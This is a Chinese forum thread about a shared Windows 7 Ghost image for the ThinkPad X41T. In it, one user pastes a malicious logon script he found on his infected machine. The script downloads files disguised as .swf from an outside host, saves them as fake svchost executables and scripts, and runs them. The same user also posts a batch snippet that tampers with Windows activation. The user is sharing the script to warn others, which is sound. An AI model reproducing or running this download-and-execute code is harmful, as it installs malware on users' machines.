【再放猛帖】X41T WIN7家庭高级版 GHOST

lioulangzhb

新建账户可能有问题的
系统字体不要全替换啊。。。

hijnyo

haodongxi 感谢

yangbo840201

在公司下载了，回去试下。
X41可以用不？

xinzhitp

这些坏东西是在Web目录下发现的。可能IE浏览器弄下来的？

lioulangzhb

应该可以但手写什么的用不上了呵呵

lioulangzhb

不清楚这个
你看看BAT是什么内容

lioulangzhb

我刚看了镜像文件没这个文件

xinzhitp

我初步肯定你的ghost有毒，稍候我上证据。我建议所有人停止下载，下载好的也先不要安装。

xinzhitp

肯定有内容，而且是很危险的东西。但我还不太肯定。

我现在机器是肯定有问题的了，现在系统通过组策略设定了启动项，其中启动项内容就是检测联网后，把一些坏东西下载到Web目录下。

我看你的gho，组策略目录下没用user这个文件夹，也就可能也是后来生成的。没用user目录，但有全局的登录脚本，脚本也有引用其他东西，而且那些东西是一次性的，很可能已经毁尸灭迹了。

@echo off
echo date %date% >>%Windir%\today.cmd
timeout /t 7 /nobreak
net stop sppsvc /y>nul
call %Windir%\Indate.cmd
timeout /t 1 /nobreak
cscript //Nologo %Windir%\System32\slmgr.vbs -xpr>nul
call %Windir%\today.cmd
timeout /t 2 /nobreak
echo y | del %Windir%\today.cmd
exit

------------------登录后启动的脚本sys.bat-------------------------------
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok
Goto End

k
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs http://liangci.gh60.com/images/u ... /20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs

Exit
:End
ping www.google.com &&Goto ok
Goto End

xinzhitp

抱歉！楼主。

我根据组策略里面的启动文件创建时间查看系统日志，在今天10点钟左右，我下载了个字体安装版，大概就是微软雅黑VistaFont这个exe文件，我直接运行了，但在Windows7下面有提示兼容问题没用成功运行，后来系统建议使用了兼容模式，这些都在系统日志里面有记录。

日志里面还记录有组策略的更改，其中就是加入了开机登录自动下载病毒的文件，于是噩梦开始了。我的备份文件.gho全都消失了，目前还不清楚其他损失。

字体问题啊，真是害死人。数据恢复软件一点用都没用，可能是病毒作了覆盖吸入，完全销毁文件了！

该死的人，快死吧。

xinzhitp

Windows7中毒记
http://999.appspot.com/t/158

lioulangzhb

替换字体要和宋体一起替换~这个我好像说了

anleeo

求楼主再放显卡驱动你OFFICE里9月19日放的包包打不开
顺便再放个batterymon电源管理软件

yangbo840201

严重关注41楼问题进展。
衡阳人民己经安装了，但是目前尚未发现异常，最新瑞星查杀无毒。

yangbo840201

经检查，完全好用。收藏并送花。

qbtsgz

我已经装在 tf 卡上用了~ 就是电源管理装上不能打开设置

xinzhitp

请放心使用，是我折腾字体导致的问题，和楼主的镜像无关。

楼主的w2k3 ramos也很不错，速度很快~

lioulangzhb

要装电池驱动

lioulangzhb

http://www.ibmnb.com/thread-885595-1-4.html

qbtsgz

能给个地址么~ 我系统装在手机内存卡上的~ 要装个东西慢的要死~ 开了系统写保护后系统运行速度还行，就是装不了软件了~

还有~ 电脑里没装硬盘启动自检的时候要等几十秒钟大概是在找硬盘吧才能启动，用U盘ramos 也是一样有没什么办法在BIOS里面设置一下跳过检测缩短启动时间？

lioulangzhb

1。搜索联想进去找~~ 真的不建议装这个
2. 3.06BIOS

qbtsgz

就是用的 3.06 BIOS 启动的时候什么提示都没有就是出现IBM logo 的时候要等几十秒才能引导装上硬盘不从硬盘启动也不要那么久的时间~

lioulangzhb

那好像没办法了

wei313

感谢lz，先顶后下。
一直想找个家庭瘦身版的给41用；）

sxsxsxh

搞下来试下！好用再谢！

wendows · 发表于 2010-9-29 04:33:45| 字数 7| - 德国

顶liou兄！

s20

没看见地址么

anleeo

感谢楼主

lioulangzhb

第一行就是

s20

不好意思只顾往下看了

		自动登录	找回密码
密码			注册

【再放猛帖】X41T WIN7家庭高级版 GHOST

回复 #30 xinzhitp 的帖子

回复 #31 lioulangzhb 的帖子

本帖子中包含更多资源

回复 #33 yangbo840201 的帖子

回复 #34 xinzhitp 的帖子

回复 #37 lioulangzhb 的帖子

回复 #44 yangbo840201 的帖子

回复 #46 qbtsgz 的帖子

回复 #43 anleeo 的帖子

本帖子中包含更多资源

回复 #48 lioulangzhb 的帖子

回复 #51 lioulangzhb 的帖子

回复 #57 s20 的帖子

铜牌荣誉勋章(注册8年以上会员)

银牌荣誉勋章(注册10年以上会员)

月全勤勋章